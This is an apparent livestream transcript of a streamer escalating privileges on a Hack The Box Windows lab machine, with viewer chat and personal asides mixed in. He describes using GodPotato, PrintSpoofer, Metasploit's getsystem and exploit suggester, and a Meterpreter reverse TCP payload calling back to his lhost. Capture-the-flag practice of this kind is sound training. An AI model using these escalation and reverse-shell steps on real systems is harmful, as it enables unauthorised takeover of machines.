gonna not use it. I'm gonna try to do it without doing that. But yeah, there's probably an exploit suggester that's gonna work. Like I guarantee there's an exploit suggester that would work, but I'm gonna try to avoid it where I can. I'm gonna try to exploit it manually, just because it's harder. All right, so we need to upload godpotato.net to exe. So let's open up our notepad here, and we will copy this, and we will paste this here. But we're gonna call it godpotato.exe. Let's see if this works. This used to work like almost all the time when I was going through the OSCP labs. But I haven't got to work on Hack the Boss machine yet, unfortunately, but we'll see what happens here. It's worth the shot when print spoofer, or not print spoofer, SE impersonate is enabled. Python 3. Okay, we got that server rolling. Let's do cert util, and that should work. It's successful. Perfect. We can do dot. Let's try this. Let's see if God Potato is working. Who am I? Let's do a simple who am I? No com-based module found. Gross. It doesn't look like it's gonna work, guys. Try print spoofer. Do I should have print spoofer on here. There's tons of print spoofers. I don't even know why I shut that down. Let's try print spoofer 64-bit. Alright, so here's what I'm doing, guys. Same thing, but we're just going to navigate print spoofer exe over here. Isn't the syntax CMD? It might be. Let me try that. Maybe I have it wrong. Still nothing. Yeah. No com-based module found. We got print spoofer here. I think you just run print spoofer like this. I'll be honest with you. I never had print spoofer work on me that many times. That's why I always default to God Potato, because it's more. It works a little bit better, in my experience, but it's always worth trying. Full path, maybe. Maybe. I mean, we can try that. I don't think it's gonna work though. Let's do C:/ temp/ dang it. I use it oddly enough for my CVE. Oh, nice. 2 crack map exec. We could try to use an auto exploit here. Oh, the full path to CMD exe. Ah, I see what you're saying. Can I do up arrow key? No, I can't. Well, let's try it then. No. I don't. No, it's not gonna work because I tried a regular Oh yeah, you're right. Let's try it. You're right. Let's do. How would this work though? I only know how to do dash cmd. Do I would supply the full path here? No, misspelled cmd.exe, not cme. Did I spell it? Oh, I see what you're saying. You misspelled it. How would that work though? Alright, let's try that then. Still not working. What's up, Captain? Welcome to the stream. Thanks for stopping in. Glad to see you here. Well, we can always try a good old exploit suggester. Three-hour boxes. This is actually my second box for the day. Dang nabbit. No, it ain't working on it. I don't know what to do. It's neither is print spoofer. I've had incredibly bad luck with print spoofer, to be honest with you. I hardly ever get it to work. Let's do. Oh man, my headphones are dying, guys. It can even last for 4 hours stream. That's crazy, dude. Pro Labs next. I'd like to do them eventually. Unfortunately, get system is still an option. Yeah, you're right. What could possibly go wrong? What about the other potatoes? There is a lot of other potatoes. Juicy potatoes. Print spooler variant. Didn't seem like it worked. Still Bounty Merlin. Alright, well let's background. I forget the command. But a good thing I wrote about this on a blog post. So we'll go to my blog here. It's the Metasploit for beginners. Here we go. I wrote about this. I did this. I did a thing here. There's even a video that tells you how to do it. Okay, I don't memorize nothing. And I know I put it in this blog article here. Post-exploitation. Man, my website is slow on VMs. Dang, my headphones died, guys. Well, luckily. Hopefully you guys won't hear the music back. Get system T6? What's that do? My website is not running very well on this VM. That's crazy. So slow. Exploit suggester. Here we go. This is what I want. This Sunday boxes or nah? Yeah, we're gonna do boxes on Sunday. So I'm doing 2 streams a week now. It's not 1 anymore. It's Thursdays and Sundays. We're actually gonna pwn Sunday on Sunday. It was the next box in the list of boxes for me, but we decided as a group that Sunday cannot be pwned on a Thursday. That's illegal, and they would arrest me if I did that on stream on Thursday. So Sunday is on Sunday. Oh, go straight to 6 and it works. Interesting. I've never successfully used Get System. Honestly, I never have. Give it a shot. We can do it after this exploit suggestion here. I'll do the Get System -T6. I didn't know that was a thing. I knew Get System was a thing, but I didn't know Get System -T6 was a thing. I want to see if it'll work too. That's why, LOL. Interesting. Whoa, we got a lot of exploit suggested here. Some decent ones. Some decent ones. The Wizard Dopium? Dude, what if that's the exploit that we gotta do? Remember we had a wizard on the front homepage. What if that's the way in, boys? That might be it. Alright, Captain, thanks for stopping in. Thanks for hanging out. Peace out, take care. Have a good one. Have a great night. Let's do sessions 1. Get system -T6. Let's do it. Oh, well, I gotta spell get system correctly. -T6. Guys, what if AI takes over the world? AI takes over the world and humanity is doomed, and for some reason I'm the last chance for survival. And I had the exploit in my hand and I typoed the final exploit and I failed to save humanity. I feel like that's how I would go out. Like, I'm about to take over this ruthless AI and I typo get system incorrectly, and then humanity's dead forever because I didn't shut it down because I typoed my hack. You should read Damon. What's it about? Well, get system -T6. It hasn't given me an error yet. John Connor. That'd be a cool hacker name. I bet you someone's running around with it. Wait, is Damon about John Connor? I'm confused. Timed out. Currently 15 seconds. You can configure what sessions. Get system -T6 didn't work. Let's try Wizard Dopium because I used it repeatedly for SE impersonate. Well, it didn't work. But a lot of things, when I'm doing stuff, I feel like it doesn't work for me and it works for everybody else. Like, I just have bad luck, I feel like, sometimes. What kind of PC do I use? What's up, it's Wits. We're going to stream. Thanks for stopping in. I have a custom built PC that I built a long time ago. So 2016 is when I built it. And I have only upgraded one part since 2016. I upgraded the graphics card to a 2080 Super back in 2020. So I'm running a 4-year-old graphics card right now. It's still pretty beefy graphics card, and it does it. I don't even really game on it anymore, so it doesn't really matter. Let's do background, and we will use this options set session 1 set lhost 10.10.16.30. Let's do set G lhost. Well, set G sometimes doesn't work, so there's no point in doing it. Let's run that. See if that works, guys. Target appears to be vulnerable. Exploit finished. Hopefully privileged. Bro, how you crack caches? No system was created. I made a video about it. Go to my YouTube. Go to go to the Hack Like a Pro playlist, and password cracking is there. Try the client image exploit. Scroll back up here. Client image. Session host is x86 with target is specified as set. Can I set the target to Windows x64? You must select the target. I don't think it has an x64 option. Let's try Juicy. We know that's gonna work, right? Reflection Juicy. Do you think it's gonna work? Think it's gonna work? Dang, no session. Guys, hold on a second. I will be right back. I need to get up for a sec. 1 sec. Give me like 3 minutes. Maybe not even that. All right, thanks for waiting, guys. Thanks for being patient. Sorry about that. All right. So what was the last one I tried? We tried Reflection Juicy. Let me get caught up in the chat here. Try client exploit image again, but use show targets. Okay, we'll do. Hopefully you guys are all still here. Hope you guys didn't leave. Oh no, I gotta pet my cat. He needs attention. All right, Steve. Thanks for hanging out. Appreciate you being here. Have a good night. Take care. Where was that one? It was client copy image. Show targets. There we go. Use one. Wait, what? Set targets Windows x64. Is that right? Try juicy potato. Is this? You must select the target? Isn't? How is it not selected? How do I select the target? Set target 1. Not a compatible payload. Set payload Windows x64 interpreter. Is Windows interpreter not a? Is interpreter not an option here? Oh, I have to do set payload Windows x64 interpreter. Reverse TCP. Let's see if that works. Process 64564 launched. Look at that, we got a session. Yeah, we're in. We got it. That's probably not the intended route, but you know what? Let's we'll take our wins where we can get them. We just bypassed all the way through. We didn't even get the user flag yet, so let's do shell. Change directory. Ccolon users. We will change. Well, hold on. dir. Change directory. Is this where the user flag is? I don't know. You guys are right. You guys were, telling me to use that what was it? Client copy image. Yeah. Dude, where's the user flag in this? I always keep forgetting the slash s. You guys keep telling me, and I keep forgetting that that's the thing. My bad. Let's go to the box here. I don't want guided mode. We didn't need no guided mode. Oh, that's the. All right, I have a thing in my notes that says file search, so I know how to search for files. I just don't know how to search for files. It's in my notes. There's a way to do it. There's a few different ways to do it. We'll do it this way first. This is a very long command, by the way. Pattern password. No, that's not what I want. How do I search for files in Windows? These are different kind of files. So this is searching for strings within a file. I need just a file name. Let me do a quick. How to search files in Windows command line. Is it? Oh, it's really just /s? Oh. Is there no user flag on this, bro? What the heck is going on? What do I do? Difficulty for the root flag? Honestly, very easy. You doubt my abilities? I wasn't doubting you. I never doubt. Back out to users. Change directory. C:/users. I thought when you said /s, I thought that was the search for hidden directories. There's nothing called user.txt, dude. Change. What's this? Can I just dir /c:/. No. dir/s user.txt. Is that right? It's gonna search the whole drive now. I mean, I am into authority system, so this should eventually work. I mean, I don't know how long it's gonna take to search an entire drive, but it should work eventually. In the meantime, you know what we forgot to do, guys? We forgot to read the write-up of the last box. So let's search for Valentine, and we'll read the write-up for this while it's searching for that. If you guys weren't here for the last box, you missed out on a great time, but we're glad you're here now. Well, no idea honestly if this pulls nothing. Yeah, we'll be stuck, but let's just let that run, and while that's running, we'll read the write-up for Valentine, just to see if we pwned Valentine the intended way. So, the encode, heartbleed, yup. Took advantage of heartbleed. We got the password. Yep, there's the password. We got that, and then once we got in, Tmux. Yeah. Oh yeah, that's why we didn't write the write-up, because that was obviously the intended way. Yeah, we did Valentine the intended way. It was so easy. That's why we didn't check the write-up, because of like we know we did the intended way. Okay. Yeah, Valentine was pretty easy. I like Valentine. Sometimes the easy ones are fun, because it's not fun to get frustrated. I'm easily frustrated with hacking sometimes. But when you win, it makes it so much better when it's hard, you know? Like when you get a hard box or even an insane box. Reboot and retest, because it should work. Yep. Alright. It's still searching. Should I read the write-up just to see where user.txt is? I don't know. Can you guys hear my cat meowing? What you doing, buddy? Yeah, I don't know. I don't know what to do here. Maybe it didn't spawn with a user flag. Maybe I should have had the user flag a long time ago. You know what I mean? When I got Merlin. That's what I'm thinking. Also, no for the cat. If one person comments cat in the chat, I will bring the cat up to the camera so you guys can see his cute fluffy butt. If you comment dog, you get banned. No, I was kidding. I mean, you pwned it. I did pwn it. I honestly think the user flag is this didn't spawn. I'm starting to think like I've never seen it to where this is taking too long, dude. Can we? Let's terminate the channel. You know what? Let's just read the write up, dude. Say less. He said cat. He went over here. I gotta get up now. Oh, come on. Here he is. He's an orange kitty. He's 2 years old. His name's Pikel. He's big and fluffy. He weighs about 13 pounds. He's the greatest hunter cat I've ever seen in my life. He once caught 2 birds before noon. And he's adorable. Aren't ya, bud? He's a big cat. He's pretty big. Let's read the write up, dude. I'm starting to think that the user flag just didn't spawn. Official write up. I pwned it all the way. I got the root flag. There's gotta be under. Oh, let's look here. They use Shellevator to elevate to root. There's a few different metasploits that they used. They used WMI RECV notif, and they used Shellevator. So they used Metasploit too. They didn't use the same module as us, but they did use Metasploit and the exploit suggester. Upgrade PowerShell shell. We did that. Web.config. Yep. Reverse shell is received. We did that. No hotfix has been applied. Vulnerable kernel exploits. Upgraded PowerShell. We did. It doesn't tell me where the user flag is, dude. My twin's cat, while he lived with us, ran a house with 2 pit bulls. They were scared as heck of her. Nice. Speaking of twins, I got 2 cats that are twins. He's got a brother. He's got a twin brother. They're born on the same day. Looks almost the same. They're both big and orange. They got completely different personalities, though. Dude, where is the user flag? Where's the user flag? It's not in the official write-up. So let's try to find. Let's find a different write-up that someone else did. I don't want to do a YouTube video because I feel like I'm stealing someone else's stuff if I do that. Dang, dude, that must be a bad write-up and you get a 20% rating out of 5. Okay. Who's got the most ratings? This one's got 19. Oh, OSDF? Yeah, he makes good stuff. Let's see if he wrote where the user txt is. Now let's show I can grab user txt. Strangely, it's not present when I look for it. Turns out that the file is there, it's just hidden. Wait, what? Cat user.txt? I'm so confused, bro. He did GCI-force. That's a thing? What is this? I never would have figured that out in a million years. I didn't know this was a thing. It's not recognized? CGI force? I'm so confused. What did he do? He's in PowerShell? I thought I am in Power. Oh, I'm not in PowerShell. Hold up. I thought I was. I'm confused. Is PowerShell broken or what? I don't understand why. How do you hide a file like that? Huh. Can I not load up PowerShell? How am I supposed to get this flag? Well, let's go ahead and duplicate this. Well, I guess we didn't have to do that. 19 ratings. Let's see if this person has a different way of getting it. He literally just typed it out and got it. Like, he just got the user flag. Bro, is my box broken? Do I need to revert this? He literally just did a type user.txt and it was there. What if we... What if we just did this? Change directory, cpon slash user slash merlin slash desktop, and we type user.txt anyways. Oh, there it is. So if you do a dir, it's hidden, but if you just type user.txt, wow, alright, interesting. So it was there the whole time. You can just type it out. That was weird. I've never seen that before. Well, that was fun. The user flag was harder than the root flag. I'm gonna get that one not too easy. Like, I didn't know it was a thing. It was easy getting the shell, in my opinion, but finding the flag, I didn't know that. I thought if you just search for user.txt, it would find. Very strange. But let's look at the official write-up here, which was here. So the official write-up, I mean, we did it the intended way. We got it through that way. They use Metasploit there, so yeah, we did it the intended way. Well, we use a different Metasploit module, but we use Metasploit regardless. I mean, it works the same way. Just under the hood, it's working way differently, but Metasploit's Metasploit, I guess. Okay, well, that's going to be it for the stream, guys. Thanks for hanging out. Thanks for watching. Thanks for being here. We went over 4 hours for the first time. First stream over 4 hours. But you got to do what you got to do to get it done. Let's go ahead and stop this machine. So if you haven't already subscribed to the channel, do me a favor, hit the subscribe button. Would really appreciate that. Hit like on this stream. And hopefully I see you in some other videos. I make content on here every single week. Sorry, I make content every day and I stream every single week. So I stream on Thursdays and Sundays. Thursdays at 7 p.m. Eastern Time. And that is 4 p.m. Pacific Time. And then on Sundays, I stream noon Eastern Time / 9 p.m. Pacific Time. And then on Friday and Saturday, I'm dropping YouTube videos on Friday and Saturday, brand new one. I got one tomorrow dropping that's going to be about the biggest cybersecurity myths. So make sure you check that out when it drops tomorrow. And then Monday and Tuesday, I got podcast clips coming out. And then Wednesdays, there's a fresh podcast episode of the Hackers Cache every Wednesday. So check out my other content if you haven't already. Thanks for being here. Thanks for hanging out. You guys are awesome. Hopefully you learned something. I know I did. You guys teach me every day. Well, not every day, but every stream. And I really do appreciate you guys being here. So once again, thank you. Take care. Peace out. Have a good one. Kyser.